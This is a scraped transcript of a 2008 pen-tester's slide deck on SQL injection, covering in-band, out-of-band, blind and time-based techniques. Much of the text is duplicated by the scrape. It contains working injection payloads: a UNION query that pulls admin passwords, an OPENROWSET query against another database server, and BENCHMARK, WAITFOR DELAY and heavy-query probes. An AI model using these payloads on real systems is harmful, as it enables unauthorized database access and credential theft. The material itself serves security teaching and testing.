© 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar.
-
Upload
james-bishop -
Category
Documents
-
view
219 -
download
0
Transcript of © 2008 Security-Assessment.com 1 Time based SQL Injection Presented by Muhaimin Dzulfakar.
© 2008 Security-Assessment.com
2
Who am I
Muhaimin Dzulfakar – 90% of kiwis can't pronounce it
Known as 'Emmie'
Security Consultant – Security-Assessment.com
Application and network pen-tester
© 2008 Security-Assessment.com
3
Agenda
What is time based SQL Injection
Differences between blind and time based SQL Injection
Time based injection with heavy queries
Limitation of time based SQL Injection
© 2008 Security-Assessment.com
4
Different types of SQL Injection
In Band Injection
Out of Band Injection
Blind SQL Injection
Time Based SQL Injection
© 2008 Security-Assessment.com
5
In Band Injection
Results are embedded via union select
Useful when SQL error message is displayed
Fastest way to extract data
Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*
© 2008 Security-Assessment.com
7
Out of Band Injection
Use a different communication channel to drill for data
Ex: Web Mail application in which data received via SMTP is processed
Example of attack: Accessing your neighbour database server with OOB injection
Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT
a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;
Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT
user, pass FROM users') AS a--
© 2008 Security-Assessment.com
8
Out of Band Injection
Web server
Database BDatabase A
OOB Injection
www.buyviagra.com
10.1.1.1
© 2008 Security-Assessment.com
9
Blind SQL Injection
Application generates custom error message for failed response and normal page for successful response
Comparison between true and false response
AND 1=1 -> true AND 1=2 -> false
Read data byte by byte
© 2008 Security-Assessment.com
12
Time Based SQL Injection
Use time based to compare between true and false
For true response – time delay is executed
For failed response – time delay is not executed
Read data byte by byte – exactly the same method with blind injection
First example by Chris Anley's paper – More advanced SQL Injection
Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference
© 2008 Security-Assessment.com
13
Why we need Time Based SQL Injection
When the application generates default page for true or false response
When the application generates the same custom error page for true or false response
Injection is successful but can't be seen by the attacker
© 2008 Security-Assessment.com
14
Scenario 1 (blind injection attack)
$default=1$default=1
if value is not between 1-20if value is not between 1-20
{{
redirect user to page.php?id=$defaultredirect user to page.php?id=$default
}}
SQL statement SQL statement
1 AND 1=1 [TRUE] -> default page displayed1 AND 1=1 [TRUE] -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILEDBLIND INJECTION FAILED
© 2008 Security-Assessment.com
15
Scenario 1 (time based blind injection attack)
$default=1$default=1
if value is not between 1-20if value is not between 1-20
{{
redirect user to page.php?id=$defaultredirect user to page.php?id=$default
}}
SQL statement SQL statement
1 AND 1=1 [TRUE] -> take 5 seconds to 1 AND 1=1 [TRUE] -> take 5 seconds to response response
1 AND 1=2 [FALSE] -> take 1 second to 1 AND 1=2 [FALSE] -> take 1 second to responseresponse
TIME BASED BLIND INJECTION TIME BASED BLIND INJECTION SUCCESSSUCCESS
© 2008 Security-Assessment.com
16
Scenario 2 (blind injection attack)
$values= 1 to 20 $values= 1 to 20
if the $values are not between 1-20if the $values are not between 1-20
{{
redirect user to error.phpredirect user to error.php
}}
SQL statementSQL statement
1 AND 1=1 [TRUE] -> error page displayed1 AND 1=1 [TRUE] -> error page displayed
1 AND 1=2 [FALSE] -> error page displayed1 AND 1=2 [FALSE] -> error page displayed
BLIND INJECTION FAILEDBLIND INJECTION FAILED
© 2008 Security-Assessment.com
17
Scenario 2 (time based blind injection attack)
$values= 1 to 20 $values= 1 to 20
if the $values are not between 1-20if the $values are not between 1-20
{{
redirect user to error.phpredirect user to error.php
}}
SQL statementSQL statement
1 AND 1=1 [TRUE] -> take 5 seconds to 1 AND 1=1 [TRUE] -> take 5 seconds to responseresponse
1 AND 1=2 [FALSE] -> take 1 second to 1 AND 1=2 [FALSE] -> take 1 second to responseresponse
TIME BASED BLIND INJECTION TIME BASED BLIND INJECTION SUCCESSSUCCESS
© 2008 Security-Assessment.com
19
Spot the different
Blind injection (for mysql)
1 AND ASCII(substring((@@version),1,1))<52
if first character of database version is less than 4, it is
true
if first character of database version is 4 or more, it is
false query position operator
char
© 2008 Security-Assessment.com
20
Spot the different
Time Based Blind injection (for MySQL)
1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
if first character of database version is less than 4,
execute BENCHMARK
if first character of database version is not less than 4 ,
return 1position
operator time delayquery
char
count time
© 2008 Security-Assessment.com
21
Time Based Injection on MSSQL
Time based injection (MSSQL)
1 AND if not(substring((select \@\@version),25,1) < 52)
waitfor delay '0:0:9'--
if the first character less than 4, execute waitfor delay
time delay
query
position operator char
© 2008 Security-Assessment.com
22
Other Databases
Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions
Time Based Injection is possible by using heavy queries
Chema Alonso and Jose Prada talked about this in Microsoft Security MVP Article and Defcon 2008
2 types of conditions in 'where clause'
Light Condition first
Heavy Condition first
Select A from B where ConditionAConditionA and ConditionBConditionB
© 2008 Security-Assessment.com
23
Heavy condition first
100 Seconds
False-False
110 Seconds
TrueTrueTrue
110 Seconds
FalseFalseTrue
ResultHeavy & Light Condition
Light Condition
10sec
Heavy condition
100sec
Result from Alonso research
© 2008 Security-Assessment.com
24
Light condition first
10Seconds
False-False
110 Seconds
TrueTrueTrue
110 Seconds
FalseFalseTrue
ResultHeavy & Light Condition
Heavy Condition
100sec
Light condition
10sec
Result from Alonso research
© 2008 Security-Assessment.com
25
Heavies Queries
Oracle evaluates the conditions from left to right
MS Access evaluates the conditions from right to left
MSSQL evaluates light condition first
Table name needs to be known
Default table can be used for testing
MSSQL – sysussers
MySQL – information_schema.colums
Oracle - all_users
© 2008 Security-Assessment.com
26
Heavies Queries
Example of time based injection using heavy queries on MSSQL (light condition evaluates first)
1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
Suitable for databases that do not support time delay functions
Ex: Oracle and MS Accessheavy querylight query
© 2008 Security-Assessment.com
27
Limitation
Results are not efficient during busy times
How to get efficient results ?
Review the ipid checking (hping3)
Perform the test at 3am
Perform the test during Xmas
For heavy queries, time delay depends on how much data is stored in database
The more data, more efficient are the result